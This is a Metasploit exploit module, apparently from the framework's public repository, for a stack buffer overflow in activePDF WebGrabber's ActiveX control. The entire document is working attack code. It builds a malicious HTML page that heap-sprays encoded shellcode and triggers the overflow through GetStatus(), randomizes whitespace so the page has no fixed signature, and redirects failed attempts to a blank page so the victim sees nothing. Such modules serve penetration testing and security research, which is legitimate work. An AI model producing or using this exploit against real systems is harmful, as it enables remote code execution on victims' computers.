##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
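class MetasploitModule < Msf::Exploit::Remote
  Rank = LowRanking

  include Msf::Exploit::FILEFORMAT

  # JavaScript keywords and well-known globals that rand_text_alpha can emit at
  # short lengths (e.g. "if", "in", "do", "var"). A randomized identifier that
  # collides with one of these is a syntax error in the generated page and the
  # exploit silently never fires, so they are rejected when names are drawn.
  JS_RESERVED = %w[
    do if in for let new try var case else enum eval null this true void with
    break catch class const false super throw while yield delete export import
    return switch typeof default extends finally continue debugger function
    arguments interface protected implements instanceof package private public
    static
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'activePDF WebGrabber ActiveX Control Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When
          sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)
          an attacker may be able to execute arbitrary code. This control is not marked safe
          for scripting, so choose your attack vector accordingly.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'MC' ],
        'References' => [
          [ 'OSVDB', '64579'],
          [ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          # File-format module: the page is delivered out of band, so no payload
          # handler is started by default; start one separately when needed.
          'DisablePayloadHandler' => true
        },
        'Payload' => {
          'Space' => 1024,
          # NUL is excluded because the payload rides inside a JS string that is
          # handed to the control as a BSTR; a zero byte is assumed to truncate
          # it somewhere on the target (standard exclusion for this delivery).
          'BadChars' => "\x00",
        },
        'Platform' => 'win',
        'Targets' => [
          # 'Ret' is not a ROP/jmp gadget: it is the heap-spray landing address
          # that #exploit repeats 800 times over the overflowed buffer, so it
          # must point into the sprayed NOP region.
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
        ],
        'DisclosureDate' => '2008-08-26',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
      ]
    )
  end

  # Build the malicious HTML page and write it to FILENAME.
  #
  # Page layout, in execution order:
  #   1. the encoded payload and a 4-byte NOP seed are decoded with unescape();
  #   2. the NOP seed is doubled into a ~0x40000-character block with the
  #      payload appended, and that block is stored 400 times in an array
  #      (heap spray) so that target.ret lands in a NOP sled that slides into
  #      the payload;
  #   3. the spray address is repeated 800 times to form the overly long
  #      argument passed to GetStatus(), which triggers the overflow.
  # Any script error redirects to about:blank so the victim sees nothing.
  def exploit
    # Encode the shellcode for unescape(); endianness follows the target arch.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Create a small NOP seed; the sled itself is grown by doubling in the page.
    nops = Rex::Text.to_unescape(make_nops(4))

    # Set the return. 'V' pins little-endian byte order (the target is x86
    # Windows) rather than the host's native order that 'L' would use. The
    # address is %XX-encoded, not %uXXXX, so each byte decodes to one JS
    # character and the string handed to GetStatus() is 4 characters per copy.
    ret = Rex::Text.uri_encode([target.ret].pack('V'))

    # Randomize the javascript variable names. All ten are distinct and none is
    # a JS keyword, so the generated script cannot collide with itself.
    vname, var_i, rand1, rand2, rand3, rand4, rand5, rand6, rand7, rand8 = js_identifiers(10)

    # rand3 (20) is the padding placed before the payload inside each spray
    # block; the value is inherited from the original spray template.
    content = <<~HTML
      <html>
      <head>
      <script>
      try {
      var #{vname} = new ActiveXObject('APWebGrabber.Object');
      var #{rand1} = unescape('#{shellcode}');
      var #{rand2} = unescape('#{nops}');
      var #{rand3} = 20;
      var #{rand4} = #{rand3} + #{rand1}.length;
      while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
      var #{rand5} = #{rand2}.substring(0,#{rand4});
      var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
      while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
      var #{rand7} = new Array();
      for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
      var #{rand8} = "";
      for (#{var_i} = 0; #{var_i} < 800; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
      #{vname}.GetStatus(#{rand8},1);
      } catch( e ) { window.location = 'about:blank' ; }
      </script>
      </head>
      </html>
    HTML

    # Vary whitespace so the page does not have a fixed signature.
    content = Rex::Text.randomize_space(content)

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(content)
  end

  private

  # Return +count+ distinct random alphabetic identifiers, each of a length
  # drawn from +length_range+, none of which is a JavaScript reserved word.
  #
  # @param count [Integer] number of identifiers to produce
  # @param length_range [Range] inclusive range of identifier lengths
  # @return [Array<String>] the identifiers, in generation order
  def js_identifiers(count, length_range = 1..100)
    names = []
    while names.length < count
      candidate = rand_text_alpha(rand(length_range))
      # Reject keywords and duplicates; both would break the generated script.
      next if JS_RESERVED.include?(candidate) || names.include?(candidate)

      names << candidate
    end
    names
  end
end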
=begin
Other methods of APWebGrb.ocx reported by the author as vulnerable to the same overly long string input; this module only triggers GetStatus().
[id(0x00000050), helpstring("Clean up after a WWWPrint call.")]
void CleanUp(BSTR ServerIPAddress, long ServerPort);
[id(0x00000055)]
BSTR Wait(BSTR IPAddress, long PortNumber, short WaitTime, BSTR AcceptedCommands);
...and probably more.
=end